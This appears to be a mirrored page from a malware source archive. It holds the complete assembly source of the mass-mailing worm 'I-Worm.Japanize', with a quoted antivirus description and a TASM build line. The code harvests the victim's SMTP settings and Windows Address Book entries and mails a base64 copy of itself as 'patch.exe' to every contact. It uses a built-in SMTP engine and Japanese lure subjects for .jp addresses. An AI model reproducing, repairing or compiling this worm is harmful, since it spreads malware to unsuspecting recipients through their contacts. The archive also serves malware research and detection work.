mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
858 lines
16 KiB
NASM
858 lines
16 KiB
NASM
|
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|||
|
;;; I-Worm.Japanize
|
|||
|
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|||
|
;;;
|
|||
|
;;;
|
|||
|
;;; This has some bugs.
|
|||
|
;;;
|
|||
|
;;; Here TrendMicro description:
|
|||
|
;;; ******************************************************************
|
|||
|
;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T
|
|||
|
;;; Details:
|
|||
|
;;;The details of the email this worm arrives with may be as follows:
|
|||
|
;;;
|
|||
|
;;;To: <recipient>
|
|||
|
;;;Subject: <"Important" or random Japanese text(applicable on Japanese supported platforms)>
|
|||
|
;;;Message Body: <blank>
|
|||
|
;;;Attachment: patch.exe
|
|||
|
;;;
|
|||
|
;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system:
|
|||
|
;;;HKEY_CURRENT_USER\Software\Microsoft\
|
|||
|
;;;Internet Account Manager\Accounts\00000001
|
|||
|
;;;
|
|||
|
;;;It uses the following registry key to retrieve email addresses from the infected user's Windows Address Book (WAB):
|
|||
|
;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\
|
|||
|
;;;WAB4Wab File Name = <20>g<pathname of WAB file><3E>h
|
|||
|
;;;
|
|||
|
;;;The email arrives with the attachment PATCH.EXE. If the email address of its target ;;;user ends with the extension .jp, the worm randomly selects a phrase, from a list of 17 possible Japanese phrases below, and uses one as the subject of the email:
|
|||
|
;;;
|
|||
|
;;;
|
|||
|
;;;The English translation for the above Japanese text are as follows:
|
|||
|
;;;Re: the issue that you mentioned
|
|||
|
;;;Re: important
|
|||
|
;;;Re: long time no see
|
|||
|
;;;Re: top secret
|
|||
|
;;;Re: Hello
|
|||
|
;;;Re: important information
|
|||
|
;;;Re: data
|
|||
|
;;;the issue that you mentioned
|
|||
|
;;;important
|
|||
|
;;;long time no see
|
|||
|
;;;top secret
|
|||
|
;;;hello
|
|||
|
;;;important information
|
|||
|
;;;data
|
|||
|
;;;frog
|
|||
|
;;;shit
|
|||
|
;;;shit
|
|||
|
;;;
|
|||
|
;;;Otherwise, it uses the subject <20>gImportant."
|
|||
|
;;;
|
|||
|
;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email.
|
|||
|
;;;
|
|||
|
;;;The following text strings are found in the worm body:
|
|||
|
;;;
|
|||
|
;;;<3B>eXXXXXXXXXXXXXXXXXXXXXXX<58>f
|
|||
|
;;;<3B>eXXXXX I-Worm.Japanize XXXXX<58>f
|
|||
|
;;;<3B>eXXXXXXXXXXXXXXXXXXXXXXX<58>f
|
|||
|
;;;
|
|||
|
;;;
|
|||
|
|
|||
|
.586p
|
|||
|
.model flat
|
|||
|
locals
|
|||
|
jumps
|
|||
|
|
|||
|
|
|||
|
;;; some lazy shit
|
|||
|
callW macro @@@x
|
|||
|
extrn @@@x:proc
|
|||
|
call @@@x
|
|||
|
endm
|
|||
|
|
|||
|
ofs equ offset
|
|||
|
|
|||
|
dwo equ dword ptr
|
|||
|
wo equ word ptr
|
|||
|
by equ byte ptr
|
|||
|
|
|||
|
HKEY_CURRENT_USER EQU 80000001h
|
|||
|
CRLF equ <13,10>
|
|||
|
rdtsc equ <dw 310fh>
|
|||
|
AF_INET equ 2
|
|||
|
SOCK_STREAM equ 1
|
|||
|
|
|||
|
FILE_ATTRIBUTE_NORMAL EQU 00000080h
|
|||
|
GENERIC_READ EQU 80000000h
|
|||
|
GENERIC_WRITE EQU 40000000h
|
|||
|
PAGE_READONLY EQU 00000002h
|
|||
|
PAGE_READWRITE EQU 00000004h
|
|||
|
FILE_MAP_READ EQU 00000004h
|
|||
|
OPEN_EXISTING EQU 00000003h
|
|||
|
GHND EQU 042h
|
|||
|
FILE_SHARE_READ EQU 00000001h
|
|||
|
FILE_SHARE_WRITE EQU 00000002h
|
|||
|
|
|||
|
|
|||
|
;;; ----------------------------------------------------------------
|
|||
|
.data
|
|||
|
hReg dd ?; registry handle
|
|||
|
str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0
|
|||
|
str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\'
|
|||
|
AccountIdx db 9 dup(?); account index
|
|||
|
bufsiz_accountidx dd 9; size
|
|||
|
|
|||
|
str_DMA db 'Default Mail Account',0
|
|||
|
str_SMTPNAME db 'SMTP Server',0
|
|||
|
str_SMTPEmailAddr db 'SMTP Email Address',0
|
|||
|
str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0
|
|||
|
|
|||
|
|
|||
|
SMTP_Server db 50 dup(?) ; default smtp server
|
|||
|
bufsiz_SMTPSERVER dd 50
|
|||
|
morons_Mailaddr db 256 dup(?) ; mail address of moron :)
|
|||
|
bufsiz_morons_mailaddr dd 256
|
|||
|
wab4_path db 260 dup(?); wab file path
|
|||
|
bufsiz_wab4_path dd 260
|
|||
|
|
|||
|
buffer db 1000 dup(?)
|
|||
|
|
|||
|
hwab4file dd ? ; wab4 file handle
|
|||
|
hwab4map dd ? ;
|
|||
|
hwab4mapview dd ? ;
|
|||
|
|
|||
|
myfilename db 260 dup(?) ; handle of myself
|
|||
|
hmyfile dd ?
|
|||
|
fsize dd ? ; file size
|
|||
|
|
|||
|
hmemout0 dd ?
|
|||
|
ptr_myself dd ?
|
|||
|
hmemout dd ? ; globalalloc
|
|||
|
ptr_base64buf dd ? ; globallock
|
|||
|
|
|||
|
target_mailaddr db 48h dup(?) ;
|
|||
|
|
|||
|
sockaddr_in label byte ;
|
|||
|
sin_family dw ?
|
|||
|
sin_port dw ?
|
|||
|
sin_addr dd ?
|
|||
|
sin_zero db 8 dup(?)
|
|||
|
len_sockaddr_in = $ - ofs sockaddr_in
|
|||
|
|
|||
|
sock dd ? ; socket descriptor
|
|||
|
|
|||
|
recv_buffer db 1024 dup(?) ; recv buffer
|
|||
|
|
|||
|
jflag dd 0 ; japanese or not
|
|||
|
|
|||
|
smtp_HELO db 'HELO localhost',CRLF
|
|||
|
len_smtp_HELO = $ - ofs smtp_HELO
|
|||
|
smtp_MAIL_FROM db 'MAIL FROM: '
|
|||
|
len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM
|
|||
|
;crlf
|
|||
|
smtp_RCPT_TO db 'RCPT TO: '
|
|||
|
len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO
|
|||
|
;crlf
|
|||
|
smtp_DATA db 'DATA',CRLF
|
|||
|
len_smtp_DATA = $ - ofs smtp_DATA
|
|||
|
smtp_BODY_FROM db 'FROM: '
|
|||
|
len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM
|
|||
|
smtp_BODY_TO db CRLF,'TO: '
|
|||
|
len_smtp_BODY_TO = $ - ofs smtp_BODY_TO
|
|||
|
smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF
|
|||
|
len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT
|
|||
|
|
|||
|
smtp_DOT_CRLF db '.',CRLF
|
|||
|
len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF
|
|||
|
smtp_QUIT db 'QUIT',CRLF
|
|||
|
len_smtp_QUIT = $ - ofs smtp_QUIT
|
|||
|
|
|||
|
smtp_crlf db CRLF
|
|||
|
|
|||
|
smtp_MIME_h db 'MIME-Version: 1.0',CRLF
|
|||
|
db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF
|
|||
|
db CRLF
|
|||
|
db '--Boundary-a8dfidaoRadvfuck',CRLF
|
|||
|
db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF
|
|||
|
db 'Content-Transfer-Encoding: 7bit',CRLF
|
|||
|
db 'Content-Description: Mail message body',CRLF
|
|||
|
db CRLF
|
|||
|
db CRLF ; text
|
|||
|
db CRLF
|
|||
|
db '--Boundary-a8dfidaoRadvfuck',CRLF
|
|||
|
db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF
|
|||
|
db 'Content-Disposition: attachment; filename="patch.exe"',CRLF
|
|||
|
db 'Content-Transfer-Encoding: BASE64',CRLF
|
|||
|
db CRLF
|
|||
|
len_smtp_MIME_h = $ - ofs smtp_MIME_h
|
|||
|
;; base64 body
|
|||
|
smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF
|
|||
|
len_smtp_MIME_e = $ - ofs smtp_MIME_e
|
|||
|
|
|||
|
r_seed dd 10987293h ; random seed
|
|||
|
|
|||
|
|
|||
|
smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?'
|
|||
|
len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1
|
|||
|
smtp_jsubject_2 db '?=',CRLF
|
|||
|
len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2
|
|||
|
|
|||
|
|
|||
|
;;; japanese subjects table
|
|||
|
japanese_subjects label byte
|
|||
|
dd ofs js_01
|
|||
|
dd ofs js_02
|
|||
|
dd ofs js_03
|
|||
|
dd ofs js_04
|
|||
|
dd ofs js_05
|
|||
|
dd ofs js_06
|
|||
|
dd ofs js_07
|
|||
|
dd ofs js_08
|
|||
|
dd ofs js_09
|
|||
|
dd ofs js_10
|
|||
|
dd ofs js_11
|
|||
|
dd ofs js_12
|
|||
|
dd ofs js_13
|
|||
|
dd ofs js_14
|
|||
|
dd ofs js_15
|
|||
|
dd ofs js_16
|
|||
|
dd ofs js_17
|
|||
|
num_of_jsub = ($ - ofs japanese_subjects)/4
|
|||
|
js_01 db 'GyRCPUVNVxsoQg==',0 ; <20>d<EFBFBD>v
|
|||
|
js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re:<3A>d<EFBFBD>v
|
|||
|
js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; <20>d<EFBFBD>v<EFBFBD>Ȃ<EFBFBD><C882>m<EFBFBD>点
|
|||
|
js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re:<3A>d<EFBFBD>v<EFBFBD>Ȃ<EFBFBD><C882><EFBFBD><EFBFBD>点
|
|||
|
js_05 db 'GyRCTmMkTjdvGyhC',0 ; <20><><EFBFBD>̌<EFBFBD>
|
|||
|
js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re:<3A><><EFBFBD>̌<EFBFBD>
|
|||
|
js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; <20><><EFBFBD>v<EFBFBD><76><EFBFBD>Ԃ<EFBFBD><D482>ł<EFBFBD>
|
|||
|
js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re:<3A><><EFBFBD>v<EFBFBD><76><EFBFBD>Ԃ<EFBFBD><D482>ł<EFBFBD>
|
|||
|
js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; <20><><EFBFBD><EFBFBD><EFBFBD>ɂ<EFBFBD><C982><EFBFBD>
|
|||
|
js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re:<3A><><EFBFBD><EFBFBD><EFBFBD>ɂ<EFBFBD><C982><EFBFBD>
|
|||
|
js_11 db 'GyRCNktIaxsoQg==',0 ; <20>ɔ<EFBFBD>
|
|||
|
js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re:<3A>ɔ<EFBFBD>
|
|||
|
js_13 db 'GyRCO3FOQRsoQg==',0 ; <20><><EFBFBD><EFBFBD>
|
|||
|
js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re:<3A><><EFBFBD><EFBFBD>
|
|||
|
js_15 db 'GyRCMz8bKEI=',0 ; <20><><EFBFBD>
|
|||
|
js_16 db 'GyRCJSYlYxsoQlI=',0 ; <20>E<EFBFBD>\<5C>R
|
|||
|
js_17 db 'GyRCJCYkcyQzGyhC',0 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
.code
|
|||
|
start:
|
|||
|
callW GetTickCount
|
|||
|
mov dwo [r_seed],eax
|
|||
|
jmp @@go
|
|||
|
;; signature :)
|
|||
|
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
|
|||
|
db 'XXXXX I-Worm.Japanize XXXXX',0
|
|||
|
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
|
|||
|
@@go:
|
|||
|
call get_some_info
|
|||
|
|
|||
|
push ofs buffer
|
|||
|
push 0101h
|
|||
|
callW WSAStartup
|
|||
|
test eax,eax
|
|||
|
jnz exit
|
|||
|
|
|||
|
call open_wab
|
|||
|
test eax,eax
|
|||
|
jnz clean_sock
|
|||
|
|
|||
|
call create_base64enc
|
|||
|
|
|||
|
call spread
|
|||
|
|
|||
|
free_mem:
|
|||
|
push dwo [ptr_base64buf]
|
|||
|
callW GlobalUnlock
|
|||
|
push dwo [hmemout]
|
|||
|
callW GlobalFree
|
|||
|
|
|||
|
close_wab4:
|
|||
|
push dwo [hwab4file]
|
|||
|
push dwo [hwab4map]
|
|||
|
push dwo [hwab4mapview]
|
|||
|
callW CloseHandle
|
|||
|
callW CloseHandle
|
|||
|
callW CloseHandle
|
|||
|
|
|||
|
clean_sock:
|
|||
|
callW WSACleanup
|
|||
|
|
|||
|
exit:
|
|||
|
push 0
|
|||
|
callW ExitProcess
|
|||
|
|
|||
|
|
|||
|
|
|||
|
spread:
|
|||
|
;; lifewire ;)
|
|||
|
mov esi,dwo [hwab4mapview]
|
|||
|
mov ecx,[esi+64h] ; num of addr
|
|||
|
jecxz @@exit
|
|||
|
add esi,[esi+60h] ; ptr to addr
|
|||
|
|
|||
|
@@spread_loop:
|
|||
|
push ecx
|
|||
|
|
|||
|
mov eax,esi
|
|||
|
cmp by [esi+1],0
|
|||
|
jne @@nounicode
|
|||
|
push esi
|
|||
|
lea edi,target_mailaddr
|
|||
|
push edi
|
|||
|
|
|||
|
push 48h
|
|||
|
pop ecx
|
|||
|
@@1:
|
|||
|
lodsw
|
|||
|
stosb
|
|||
|
loop @@1
|
|||
|
|
|||
|
pop eax
|
|||
|
pop esi
|
|||
|
add esi,20h
|
|||
|
|
|||
|
@@nounicode:
|
|||
|
call spread2
|
|||
|
|
|||
|
add esi,24h
|
|||
|
pop ecx
|
|||
|
loop @@spread_loop
|
|||
|
|
|||
|
@@exit:
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
spread2:
|
|||
|
push esi
|
|||
|
mov esi,eax ; now esi=email addr
|
|||
|
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 2
|
|||
|
callW socket
|
|||
|
mov dwo [sock],eax
|
|||
|
|
|||
|
mov wo [sin_family],AF_INET
|
|||
|
mov ax,25
|
|||
|
xchg al,ah
|
|||
|
mov wo [sin_port],ax
|
|||
|
|
|||
|
push ofs SMTP_Server
|
|||
|
callW gethostbyname
|
|||
|
test eax,eax
|
|||
|
jz @@exit
|
|||
|
|
|||
|
mov eax,[eax+12]
|
|||
|
mov eax,[eax]
|
|||
|
mov eax,[eax]
|
|||
|
|
|||
|
mov dwo [sin_addr],eax
|
|||
|
push len_sockaddr_in
|
|||
|
lea eax,sockaddr_in
|
|||
|
push eax
|
|||
|
push dwo [sock]
|
|||
|
callW connect
|
|||
|
test eax,eax
|
|||
|
jnz @@exit
|
|||
|
|
|||
|
call sendmail
|
|||
|
|
|||
|
@@exit:
|
|||
|
pop esi
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;;; ---
|
|||
|
;;; reg stuff
|
|||
|
get_some_info:
|
|||
|
xor ebx,ebx
|
|||
|
|
|||
|
push ofs hReg
|
|||
|
push 1
|
|||
|
push ebx
|
|||
|
push ofs str_SMInternetAccountManager
|
|||
|
push HKEY_CURRENT_USER
|
|||
|
callW RegOpenKeyExA
|
|||
|
test eax,eax
|
|||
|
jnz @@error
|
|||
|
|
|||
|
push ofs bufsiz_accountidx
|
|||
|
push ofs AccountIdx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push ofs str_DMA
|
|||
|
push dwo [hReg]
|
|||
|
callW RegQueryValueExA
|
|||
|
test eax,eax
|
|||
|
jnz @@error
|
|||
|
|
|||
|
push dwo [hReg]
|
|||
|
callW RegCloseKey
|
|||
|
|
|||
|
push ofs hReg
|
|||
|
push 1
|
|||
|
push ebx
|
|||
|
push ofs str_SMIAccounts
|
|||
|
push HKEY_CURRENT_USER
|
|||
|
callW RegOpenKeyExA
|
|||
|
test eax,eax
|
|||
|
jnz @@error
|
|||
|
|
|||
|
push ofs bufsiz_SMTPSERVER
|
|||
|
push ofs SMTP_Server
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push ofs str_SMTPNAME
|
|||
|
push dwo [hReg]
|
|||
|
callW RegQueryValueExA
|
|||
|
test eax,eax
|
|||
|
jnz @@error
|
|||
|
|
|||
|
push ofs bufsiz_morons_mailaddr
|
|||
|
push ofs morons_Mailaddr
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push ofs str_SMTPEmailAddr
|
|||
|
push dwo [hReg]
|
|||
|
callW RegQueryValueExA
|
|||
|
test eax,eax
|
|||
|
jnz @@error
|
|||
|
|
|||
|
push dwo [hReg]
|
|||
|
callW RegCloseKey
|
|||
|
|
|||
|
push ofs hReg
|
|||
|
push 1
|
|||
|
push ebx
|
|||
|
push ofs str_SMWab4
|
|||
|
push HKEY_CURRENT_USER
|
|||
|
callW RegOpenKeyExA
|
|||
|
test eax,eax
|
|||
|
jnz @@error
|
|||
|
|
|||
|
push ofs bufsiz_wab4_path
|
|||
|
push ofs wab4_path
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push dwo [hReg]
|
|||
|
callW RegQueryValueExA
|
|||
|
test eax,eax
|
|||
|
jnz @@error
|
|||
|
|
|||
|
push dwo [hReg]
|
|||
|
callW RegCloseKey
|
|||
|
xor eax,eax
|
|||
|
ret
|
|||
|
@@error:
|
|||
|
xor eax,eax
|
|||
|
dec eax
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
open_wab:
|
|||
|
xor ebx,ebx
|
|||
|
push ebx
|
|||
|
push FILE_ATTRIBUTE_NORMAL
|
|||
|
push OPEN_EXISTING
|
|||
|
push ebx
|
|||
|
push FILE_SHARE_WRITE
|
|||
|
push GENERIC_READ
|
|||
|
push ofs wab4_path
|
|||
|
callW CreateFileA
|
|||
|
inc eax
|
|||
|
jz @@error
|
|||
|
dec eax
|
|||
|
mov dwo [hwab4file],eax
|
|||
|
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push PAGE_READONLY
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
callW CreateFileMappingA
|
|||
|
mov dwo [hwab4map],eax
|
|||
|
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push FILE_MAP_READ
|
|||
|
push eax
|
|||
|
callW MapViewOfFile
|
|||
|
mov dwo [hwab4mapview],eax
|
|||
|
xor eax,eax
|
|||
|
ret
|
|||
|
@@error:
|
|||
|
xor eax,eax
|
|||
|
dec eax
|
|||
|
ret
|
|||
|
|
|||
|
create_base64enc:
|
|||
|
push 260
|
|||
|
push ofs myfilename
|
|||
|
push 0
|
|||
|
callW GetModuleFileNameA
|
|||
|
|
|||
|
xor ebx,ebx
|
|||
|
push ebx
|
|||
|
push FILE_ATTRIBUTE_NORMAL
|
|||
|
push OPEN_EXISTING
|
|||
|
push ebx
|
|||
|
push FILE_SHARE_READ
|
|||
|
push GENERIC_READ
|
|||
|
push ofs myfilename
|
|||
|
callW CreateFileA
|
|||
|
inc eax
|
|||
|
jz @@error
|
|||
|
dec eax
|
|||
|
mov dwo [hmyfile],eax
|
|||
|
|
|||
|
push 0
|
|||
|
push dwo [hmyfile]
|
|||
|
callW GetFileSize
|
|||
|
mov dwo [fsize],eax
|
|||
|
|
|||
|
add eax,100h
|
|||
|
push eax
|
|||
|
push GHND
|
|||
|
callW GlobalAlloc
|
|||
|
mov dwo [hmemout0],eax
|
|||
|
|
|||
|
push eax
|
|||
|
callW GlobalLock
|
|||
|
mov dwo [ptr_myself],eax
|
|||
|
|
|||
|
push 0
|
|||
|
push ofs recv_buffer
|
|||
|
push dwo [fsize]
|
|||
|
push eax
|
|||
|
push dwo [hmyfile]
|
|||
|
callW ReadFile
|
|||
|
test eax,eax
|
|||
|
jz @@eexit
|
|||
|
|
|||
|
push 0
|
|||
|
push dwo [hmyfile]
|
|||
|
callW GetFileSize
|
|||
|
push eax ; save size
|
|||
|
|
|||
|
shl eax,1 ; eax*2
|
|||
|
|
|||
|
push eax
|
|||
|
push GHND
|
|||
|
callW GlobalAlloc
|
|||
|
mov dwo [hmemout],eax
|
|||
|
|
|||
|
push eax
|
|||
|
callW GlobalLock
|
|||
|
mov dwo [ptr_base64buf],eax
|
|||
|
|
|||
|
; pop ebx ; restore size
|
|||
|
; push ebx ; size
|
|||
|
push eax
|
|||
|
push dwo [ptr_myself]
|
|||
|
call base64encode
|
|||
|
|
|||
|
|
|||
|
push dwo [hmyfile]
|
|||
|
callW CloseHandle
|
|||
|
|
|||
|
push dwo [ptr_myself]
|
|||
|
callW GlobalUnlock
|
|||
|
push dwo [hmemout0]
|
|||
|
callW GlobalFree
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
ret
|
|||
|
|
|||
|
@@eexit:
|
|||
|
push dwo [hmyfile]
|
|||
|
callW CloseHandle
|
|||
|
|
|||
|
push dwo [ptr_myself]
|
|||
|
callW GlobalUnlock
|
|||
|
push dwo [hmemout0]
|
|||
|
callW GlobalFree
|
|||
|
|
|||
|
@@error:
|
|||
|
xor eax,eax
|
|||
|
dec eax
|
|||
|
ret
|
|||
|
|
|||
|
base64encode proc pascal
|
|||
|
arg @@src
|
|||
|
arg @@dest
|
|||
|
arg @@srclen
|
|||
|
|
|||
|
mov esi,dwo [@@src]
|
|||
|
mov edi,dwo [@@dest]
|
|||
|
|
|||
|
@@b64loop:
|
|||
|
xor eax,eax
|
|||
|
cmp dwo [@@srclen],1
|
|||
|
jne @@srclen2
|
|||
|
lodsb
|
|||
|
push 2
|
|||
|
pop ecx
|
|||
|
mov edx,03D3Dh ; ==
|
|||
|
dec dwo [@@srclen]
|
|||
|
jmp @@b64next
|
|||
|
|
|||
|
@@srclen2:
|
|||
|
cmp dwo [@@srclen],2
|
|||
|
jne @@srclen3
|
|||
|
lodsw
|
|||
|
push 3
|
|||
|
pop ecx
|
|||
|
push 03dh
|
|||
|
pop edx
|
|||
|
sub dwo [@@srclen],2
|
|||
|
jmp @@b64next
|
|||
|
@@srclen3:
|
|||
|
lodsd
|
|||
|
push 4
|
|||
|
pop ecx
|
|||
|
xor edx,edx
|
|||
|
dec esi
|
|||
|
sub dwo [@@srclen],3
|
|||
|
|
|||
|
@@b64next:
|
|||
|
bswap eax
|
|||
|
|
|||
|
@@b64n_loop:
|
|||
|
mov ebx,eax
|
|||
|
and eax,0FC000000h
|
|||
|
rol eax,6
|
|||
|
mov al,[@@b64table + eax]
|
|||
|
stosb
|
|||
|
mov eax,ebx
|
|||
|
shl eax,6
|
|||
|
dec ecx
|
|||
|
jnz @@b64n_loop
|
|||
|
|
|||
|
cmp dwo [@@srclen],0
|
|||
|
ja @@b64loop
|
|||
|
|
|||
|
mov eax,edx
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
@@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
|
|||
|
endp
|
|||
|
|
|||
|
|
|||
|
g_send:
|
|||
|
;; in
|
|||
|
;; ecx = size
|
|||
|
;; esi = ptr to data
|
|||
|
;; out
|
|||
|
;; eax = ret value of send()
|
|||
|
push 0
|
|||
|
push ecx
|
|||
|
push esi
|
|||
|
push dwo [sock]
|
|||
|
callW send
|
|||
|
ret
|
|||
|
|
|||
|
g_recv:
|
|||
|
;; out
|
|||
|
;; error -> eax=-1 success -> eax = 0
|
|||
|
@@again:
|
|||
|
push 0
|
|||
|
push 1024
|
|||
|
push ofs recv_buffer
|
|||
|
push dwo [sock]
|
|||
|
callW recv
|
|||
|
inc eax
|
|||
|
jz @@recv_error
|
|||
|
cmp eax,1024
|
|||
|
jz @@again
|
|||
|
xor eax,eax
|
|||
|
ret
|
|||
|
@@recv_error:
|
|||
|
xor eax,eax
|
|||
|
dec eax
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
sendmail:
|
|||
|
;; yea. lame routine ;)
|
|||
|
push esi ; mail addr
|
|||
|
mov dwo [jflag],0 ; flag for .jp
|
|||
|
;;
|
|||
|
call g_recv
|
|||
|
|
|||
|
;;
|
|||
|
lea esi,smtp_HELO
|
|||
|
mov ecx,len_smtp_HELO
|
|||
|
call g_send
|
|||
|
|
|||
|
call g_recv
|
|||
|
|
|||
|
;;
|
|||
|
lea esi,smtp_MAIL_FROM
|
|||
|
mov ecx,len_smtp_MAIL_FROM
|
|||
|
call g_send
|
|||
|
|
|||
|
push ofs morons_Mailaddr
|
|||
|
callW lstrlen
|
|||
|
mov ecx,eax
|
|||
|
lea esi,morons_Mailaddr
|
|||
|
call g_send
|
|||
|
mov ecx,2
|
|||
|
lea esi,smtp_crlf
|
|||
|
call g_send
|
|||
|
|
|||
|
call g_recv
|
|||
|
;;
|
|||
|
mov ecx,len_smtp_RCPT_TO
|
|||
|
lea esi,smtp_RCPT_TO
|
|||
|
call g_send
|
|||
|
|
|||
|
pop esi
|
|||
|
push esi
|
|||
|
|
|||
|
push esi
|
|||
|
callW lstrlen
|
|||
|
push eax ; save
|
|||
|
mov ecx,eax
|
|||
|
call g_send
|
|||
|
|
|||
|
mov ecx,2
|
|||
|
lea esi,smtp_crlf
|
|||
|
call g_send
|
|||
|
|
|||
|
call g_recv
|
|||
|
|
|||
|
;; .jp?
|
|||
|
pop eax ; len of mail address
|
|||
|
pop esi
|
|||
|
push esi ; mail address
|
|||
|
add esi,eax
|
|||
|
sub esi,3
|
|||
|
cmp dwo [esi],00706a2eh ; .jp?
|
|||
|
jne @@1
|
|||
|
inc dwo [jflag]
|
|||
|
@@1:
|
|||
|
;;
|
|||
|
|
|||
|
lea esi,smtp_DATA
|
|||
|
mov ecx,len_smtp_DATA
|
|||
|
call g_send
|
|||
|
|
|||
|
call g_recv
|
|||
|
;;
|
|||
|
|
|||
|
lea esi,smtp_BODY_FROM
|
|||
|
mov ecx,len_smtp_BODY_FROM
|
|||
|
call g_send
|
|||
|
|
|||
|
push ofs morons_Mailaddr
|
|||
|
callW lstrlen
|
|||
|
mov ecx,eax
|
|||
|
lea esi,morons_Mailaddr
|
|||
|
call g_send
|
|||
|
|
|||
|
lea esi,smtp_BODY_TO
|
|||
|
mov ecx,len_smtp_BODY_TO
|
|||
|
call g_send
|
|||
|
|
|||
|
pop esi
|
|||
|
push esi
|
|||
|
|
|||
|
push esi
|
|||
|
callW lstrlen
|
|||
|
mov ecx,eax
|
|||
|
call g_send
|
|||
|
|
|||
|
cmp dwo [jflag],0
|
|||
|
jnz @@jsubject
|
|||
|
|
|||
|
mov ecx,len_smtp_BODY_SUBJECT
|
|||
|
lea esi,smtp_BODY_SUBJECT
|
|||
|
call g_send
|
|||
|
jmp @@body
|
|||
|
|
|||
|
@@jsubject:
|
|||
|
;; gen subject
|
|||
|
mov ecx,len_smtp_jsubject_1
|
|||
|
lea esi,smtp_jsubject_1
|
|||
|
call g_send
|
|||
|
|
|||
|
mov esi,(num_of_jsub-1)
|
|||
|
call rng
|
|||
|
lea esi,japanese_subjects
|
|||
|
mov esi,dwo [esi+eax*4]
|
|||
|
push esi
|
|||
|
callW lstrlen
|
|||
|
mov ecx,eax
|
|||
|
call g_send
|
|||
|
|
|||
|
mov ecx,len_smtp_jsubject_2
|
|||
|
lea esi,smtp_jsubject_2
|
|||
|
call g_send
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@@body:
|
|||
|
lea esi,smtp_MIME_h
|
|||
|
mov ecx,len_smtp_MIME_h
|
|||
|
call g_send
|
|||
|
|
|||
|
mov esi,dwo [ptr_base64buf]
|
|||
|
push esi
|
|||
|
push esi
|
|||
|
callW lstrlen
|
|||
|
pop esi
|
|||
|
mov ecx,eax
|
|||
|
call g_send
|
|||
|
|
|||
|
lea esi,smtp_MIME_e
|
|||
|
mov ecx,len_smtp_MIME_e
|
|||
|
call g_send
|
|||
|
|
|||
|
|
|||
|
mov ecx,len_smtp_DOT_CRLF
|
|||
|
lea esi,smtp_DOT_CRLF
|
|||
|
call g_send
|
|||
|
|
|||
|
call g_recv
|
|||
|
;;
|
|||
|
|
|||
|
mov ecx,len_smtp_QUIT
|
|||
|
lea esi,smtp_QUIT
|
|||
|
call g_send
|
|||
|
|
|||
|
call g_recv
|
|||
|
pop esi
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
rng:
|
|||
|
;; in
|
|||
|
;; esi = range
|
|||
|
;; out
|
|||
|
;; eax = random number
|
|||
|
rdtsc
|
|||
|
xor eax,edx
|
|||
|
imul eax,dwo [r_seed]
|
|||
|
dec eax
|
|||
|
mov dwo [r_seed],eax
|
|||
|
xor edx,edx
|
|||
|
div esi
|
|||
|
mov eax,edx
|
|||
|
ret
|
|||
|
|
|||
|
end start
|
|||
|
|
|||
|
*************************************************************************
|
|||
|
|
|||
|
@ECHO OFF
|
|||
|
TASM32 /ml /m /z japanize.asm,japanize.obj
|
|||
|
